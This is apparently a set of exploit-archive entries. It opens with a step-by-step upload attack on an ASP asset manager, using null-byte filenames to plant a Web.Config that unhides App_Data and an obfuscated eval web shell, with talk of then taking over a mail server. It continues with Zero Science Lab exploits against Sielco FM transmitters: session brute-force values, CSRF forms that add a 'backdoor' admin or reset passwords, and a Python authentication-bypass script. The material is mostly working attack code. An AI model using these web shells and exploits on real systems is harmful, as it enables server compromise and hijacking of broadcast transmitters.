https://www.pentest.com/App_Data <<<= [ 404 ERROR - N/A ] " " " " " ################################################################################################## ########################################################################################################################################################## # # # What is the App_Data Folder useful? # # App_Data contains application data files including .mdf database files, XML files, and other data store files. # # The App_Data folder is used by ASP.NET to store an application's local database, such as the database for maintaining membership and role information. # # The App_Data folder is not public like the other website directories under the Home Directory. # # Because it's a private directory, the IIS server hides it for security reasons. # # Now, we will test whether such a directory exists. # # If the directory exists, we will make it public so that we can define the necessary server functions for running a shell within it. # # For this we will try to load a special server configuration file. This is a Web.Config file. With this we'll ByPass the directory privacy. # # So the directory will be public and it will be able to respond to external queries and run a shell. # # # ########################################################################################################################################################## ================================================================================================== POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2 Host: www.pentest.com Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG Content-Length: 473 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://www.pentest.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpCurrFolder2" C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpFilter" ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="File1"; filename="Web.Config%00net.txt" Content-Type: application/octet-stream <configuration> <system.webServer> <defaultDocument> <files> <add value="*.asp" /> <add value="*.aspx" /> <add value="*.php" /> </files> </defaultDocument> <security> <requestFiltering> <hiddenSegments> <clear /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS-- ================================================================================================== " ...[ RESPONCE ]... " " " " OK! " " " " UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\Web.Config ] " " " " TEST WORK for App_Data DIR : https://www.pentest.com/App_Data <<<= [ 403 ERROR - OK. ] " " " ================================================================================================== # Now we will upload your shell to the directory where we made ByPass. # ================================================================================================== POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2 Host: www.pentest.com Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG Content-Length: 473 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://www.pentest.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpCurrFolder2" C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpFilter" ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="File1"; filename="shell.aspx%00aspx.txt" Content-Type: application/octet-stream <%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %> <%var PAY:String= Request["\x61\x62\x63\x64"];eval (PAY,"\x75\x6E\x73\x61"+ "\x66\x65");%> ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS-- ====================================================================================================== " ...[ RESPONCE ]... " " " " OK! " " " " UPLOADED FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\shell.aspx ] " " " " TEST WORK for Shell : https://www.pentest.com/App_Data/shell.aspx <<<= [ OK. ] " " " ========================================================================================================================================== " " " So what can we do if no directory on the site has write permission? " " If not, we will test for vulnerabilities in the paths of other applications running on the server. " " Sometimes this can be a mail service related vulnerability, " " Sometimes also it can be a "Service Permissions" vulnerability. " " Sometimes also it can be a "Binary Permissions " vulnerability. " " Sometimes also it can be a "Weak Service Permissions" vulnerability. " " Sometimes also it can be a "Unquoted Service Path" vulnerability. " " Our limits are as much as our imagination... " " *** 0DAY *** " " Ok. Now we will strengthen our lesson by exemplifying a vulnerability in the SmarterMail service. " " We saw that the SmarterMail service was installed on our IIS server and we detected a critical security vulnerability in this service. " " TEST WORK for SmarterMail Service: [ http://mail.pentest.com/interface/root#/login ] " " Data directory for this SmarterMail: [ C:\Program Files (x86)\SmarterTools\SmarterMail\MRS\App_Data ] " " As shown above, we can first navigate to the App_Data directory belonging to the SmarterMail service, " " And then upload our shell file to the server by bypassing it. " " This way, we will have full control over both the server and the mail service. " " Shell Path: [ http://mail.pentest.com/App_Data/shell.aspx ] " " " ==========================================================================================================================================

## Exploit Title: Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking ## Exploit Author: LiquidWorm Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: 2.12 (EXC5000GX) 2.12 (EXC120GX) 2.11 (EXC300GX) 2.10 (EXC1600GX) 2.10 (EXC2000GX) 2.08 (EXC1600GX) 2.08 (EXC1000GX) 2.07 (EXC3000GX) 2.06 (EXC5000GX) 1.7.7 (EXC30GT) 1.7.4 (EXC300GT) 1.7.4 (EXC100GT) 1.7.4 (EXC5000GT) 1.6.3 (EXC1000GT) 1.5.4 (EXC120GT) Summary: Sielco designs and produces FM radio transmitters for professional broadcasting. The in-house laboratory develops standard and customised solutions to meet all needs. Whether digital or analogue, each product is studied to ensure reliability, resistance over time and a high standard of safety. Sielco transmitters are distributed throughout the world and serve many radios in Europe, South America, Africa, Oceania and China. Desc: The Cookie session ID 'id' is of an insufficient length and can be exploited by brute force, which may allow a remote attacker to obtain a valid session, bypass authentication and manipulate the transmitter. Tested on: lwIP/2.1.1 Web/3.0.3 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5758 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5758.php 26.01.2023 -- # Session values (len=5) Cookie: id=44189 Cookie: id=37692 Cookie: id=+6638 Cookie: id=+3077 ... ...

<!-- ## Exploit Title: Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery ## Exploit Author: LiquidWorm Sielco Analog FM Transmitter 2.12 Cross-Site Request Forgery Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: 2.12 (EXC5000GX) 2.12 (EXC120GX) 2.11 (EXC300GX) 2.10 (EXC1600GX) 2.10 (EXC2000GX) 2.08 (EXC1600GX) 2.08 (EXC1000GX) 2.07 (EXC3000GX) 2.06 (EXC5000GX) 1.7.7 (EXC30GT) 1.7.4 (EXC300GT) 1.7.4 (EXC100GT) 1.7.4 (EXC5000GT) 1.6.3 (EXC1000GT) 1.5.4 (EXC120GT) Summary: Sielco designs and produces FM radio transmitters for professional broadcasting. The in-house laboratory develops standard and customised solutions to meet all needs. Whether digital or analogue, each product is studied to ensure reliability, resistance over time and a high standard of safety. Sielco transmitters are distributed throughout the world and serve many radios in Europe, South America, Africa, Oceania and China. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: lwIP/2.1.1 Web/3.0.3 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5757 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5757.php 26.01.2023 --> CSRF Add Admin: --------------- <html> <body> <form action="http://transmitter/protect/users.htm" method="POST"> <input type="hidden" name="pwd0" value="" /> <input type="hidden" name="pwd0bis" value="" /> <input type="hidden" name="user1" value="" /> <input type="hidden" name="pwd1" value="" /> <input type="hidden" name="pwd1bis" value="" /> <input type="hidden" name="auth1" value="" /> <input type="hidden" name="user2" value="" /> <input type="hidden" name="pwd2" value="" /> <input type="hidden" name="pwd2bis" value="" /> <input type="hidden" name="auth2" value="" /> <input type="hidden" name="user3" value="backdoor" /> <input type="hidden" name="pwd3" value="backdoor123" /> <input type="hidden" name="pwd3bis" value="backdoor123" /> <input type="hidden" name="auth3" value="2" /> <input type="submit" value="Adminize!" /> </form> </body> </html>

<!-- ## Exploit Title: Sielco Analog FM Transmitter 2.12 - Improper Access Control Change Admin Password ## Exploit Author: LiquidWorm Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: 2.12 (EXC5000GX) 2.12 (EXC120GX) 2.11 (EXC300GX) 2.10 (EXC1600GX) 2.10 (EXC2000GX) 2.08 (EXC1600GX) 2.08 (EXC1000GX) 2.07 (EXC3000GX) 2.06 (EXC5000GX) 1.7.7 (EXC30GT) 1.7.4 (EXC300GT) 1.7.4 (EXC100GT) 1.7.4 (EXC5000GT) 1.6.3 (EXC1000GT) 1.5.4 (EXC120GT) Summary: Sielco designs and produces FM radio transmitters for professional broadcasting. The in-house laboratory develops standard and customised solutions to meet all needs. Whether digital or analogue, each product is studied to ensure reliability, resistance over time and a high standard of safety. Sielco transmitters are distributed throughout the world and serve many radios in Europe, South America, Africa, Oceania and China. Desc: The application suffers from improper access control when editing users. A user with Read permissions can manipulate users, passwords and permissions by sending a single HTTP POST request with modified parameters and edit other users' names, passwords and permissions including admin password. Tested on: lwIP/2.1.1 Web/3.0.3 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5756 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5756.php 26.01.2023 --> <html> <body> <form action="http://transmitter/protect/users.htm" method="POST"> <input type="hidden" name="pwd0" value="PWDCHANGED" /> <!-- This will set/modify admin pwd --> <input type="hidden" name="pwd0bis" value="PWDCHANGED" /> <!-- This will set/modify admin pwd --> <input type="hidden" name="user1" value="" /> <!-- This will set/modify user1 --> <input type="hidden" name="pwd1" value="" /> <!-- This will set/modify user1 pwd --> <input type="hidden" name="pwd1bis" value="" /> <!-- This will set/modify user1 pwd --> <input type="hidden" name="auth1" value="0" /> <!-- This will set user1 read perm --> <input type="hidden" name="user2" value="" /> <!-- This will set/modify user2 --> <input type="hidden" name="pwd2" value="" /> <!-- This will set/modify user2 pwd --> <input type="hidden" name="pwd2bis" value="" /> <!-- This will set/modify user2 pwd --> <input type="hidden" name="auth2" value="0" /> <!-- This will set user2 read perm --> <input type="hidden" name="user3" value="" /> <!-- This will set/modify user3 --> <input type="hidden" name="pwd3" value="" /> <!-- This will set/modify user3 pwd --> <input type="hidden" name="pwd3bis" value="" /> <!-- This will set/modify user3 pwd --> <input type="hidden" name="auth3" value="0" /> <!-- This will set user3 read perm --> <input type="submit" value="Modify admin pwd, delete all users" /> </form> </body> </html>

<!-- ## Exploit Title: Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation ## Exploit Author: LiquidWorm Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: 2.12 (EXC5000GX) 2.12 (EXC120GX) 2.11 (EXC300GX) 2.10 (EXC1600GX) 2.10 (EXC2000GX) 2.08 (EXC1600GX) 2.08 (EXC1000GX) 2.07 (EXC3000GX) 2.06 (EXC5000GX) 1.7.7 (EXC30GT) 1.7.4 (EXC300GT) 1.7.4 (EXC100GT) 1.7.4 (EXC5000GT) 1.6.3 (EXC1000GT) 1.5.4 (EXC120GT) Summary: Sielco designs and produces FM radio transmitters for professional broadcasting. The in-house laboratory develops standard and customised solutions to meet all needs. Whether digital or analogue, each product is studied to ensure reliability, resistance over time and a high standard of safety. Sielco transmitters are distributed throughout the world and serve many radios in Europe, South America, Africa, Oceania and China. Desc: The application suffers from a privilege escalation vulnerability. A user with Read permissions can elevate his/her privileges by sending a HTTP POST request setting the parameter 'auth1' or 'auth2' or 'auth3' to integer value '1' for Write or '2' for Admin permissions. Tested on: lwIP/2.1.1 Web/3.0.3 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5755 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5755.php 26.01.2023 --> <html> <body> <form action="http://transmitter/protect/users.htm" method="POST"> <input type="hidden" name="pwd0" value="" /> <input type="hidden" name="pwd0bis" value="" /> <input type="hidden" name="user1" value="" /> <input type="hidden" name="pwd1" value="" /> <input type="hidden" name="pwd1bis" value="" /> <input type="hidden" name="auth1" value="" /> <input type="hidden" name="user2" value="test" /> <input type="hidden" name="pwd2" value="" /> <input type="hidden" name="pwd2bis" value="" /> <input type="hidden" name="auth2" value="2" /> <input type="hidden" name="user3" value="" /> <input type="hidden" name="pwd3" value="" /> <input type="hidden" name="pwd3bis" value="" /> <input type="hidden" name="auth3" value="" /> <input type="submit" value="Escalate" /> </form> </body> </html>

#!/usr/bin/env python3 # -*- coding: utf-8 -*- ## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit ## Exploit Author: LiquidWorm # # # Sielco PolyEco Digital FM Transmitter 2.0.6 Authentication Bypass Exploit # # # Vendor: Sielco S.r.l # Product web page: https://www.sielco.org # Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 # PolyEco1000 CPU:1.9.4 FPGA:10.19 # PolyEco1000 CPU:1.9.3 FPGA:10.19 # PolyEco500 CPU:1.7.0 FPGA:10.16 # PolyEco300 CPU:2.0.2 FPGA:10.19 # PolyEco300 CPU:2.0.0 FPGA:10.19 # # Summary: PolyEco is the innovative family of high-end digital # FM transmitters of Sielco. They are especially suited as high # performance power system exciters or compact low-mid power # transmitters. The same cabinet may in fact be fitted with 50, # 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, # 1000). # # All features can be controlled via the large touch-screen display # 4.3" or remotely. Many advanced features are inside by default # in the basic version such as: stereo and RDS encoder, audio # change-over, remote-control via LAN and SNMP, "FFT" spectral # analysis of the audio sources, SFN synchronization and much more. # # Desc: The application suffers from an authentication bypass and # account takeover/lockout vulnerability that can be triggered by # directly calling the users object and effectively modifying the # password of the two constants user/role (user/admin). This can # be exploited by an unauthenticated adversary by issuing a single # POST request to the vulnerable endpoint and gain unauthorized # access to the affected device with administrative privileges. # # Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Macedonian Information Security Research and Development Laboratory # Zero Science Lab - https://www.zeroscience.mk - @zeroscience # # # Advisory ID: ZSL-2023-5769 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5769.php # # # 26.01.2023 # # import requests print( ''' .- _ _ -. / / \\ \\ ( ( (` (-o-) `) ) ) \ \_ ` -+- ` _/ / `- -+- -` -+- -+- -+- -+- -+- -+- / \\ ***************************************************** ! Sielco PolyEco Authentication Bypass Script ! ***************************************************** Please note that this script is for educational and ethical purposes only. Using it for unauthorized access or malicious activities is strictly prohibited and can have serious legal and ethical consequences. The responsibility of using this script in a lawful and ethical manner lies solely with the user. The author or creator of this script shall not be held responsible for any unlawful or unethical activities performed by the users. ''' ) url = input( ' Enter the URL (e.g. http://host:8090): ' ) if not 'http' in url : url = 'http://{}'.format( url ) user = input( ' Enter the desired role (e.g. user or admin): ') if user not in [ 'user', 'admin' ] : exit( ' Only \'user\' or \'admin\' please.' ) password = input( ' Enter the desired password: ' ) end = '/protect/users.htm' payload = {} if user == "user" : payload[ 'pwd_admin' ] = '' payload[ 'pwd_user' ] = password elif user == 'admin' : payload[ 'pwd_admin' ] = password payload[ 'pwd_user' ] = '' r = requests.post( url + end, data = payload ) if r.status_code == 200 : print( '\n MSG: OK.' ) else: print( '\n MSG: ERROR!' )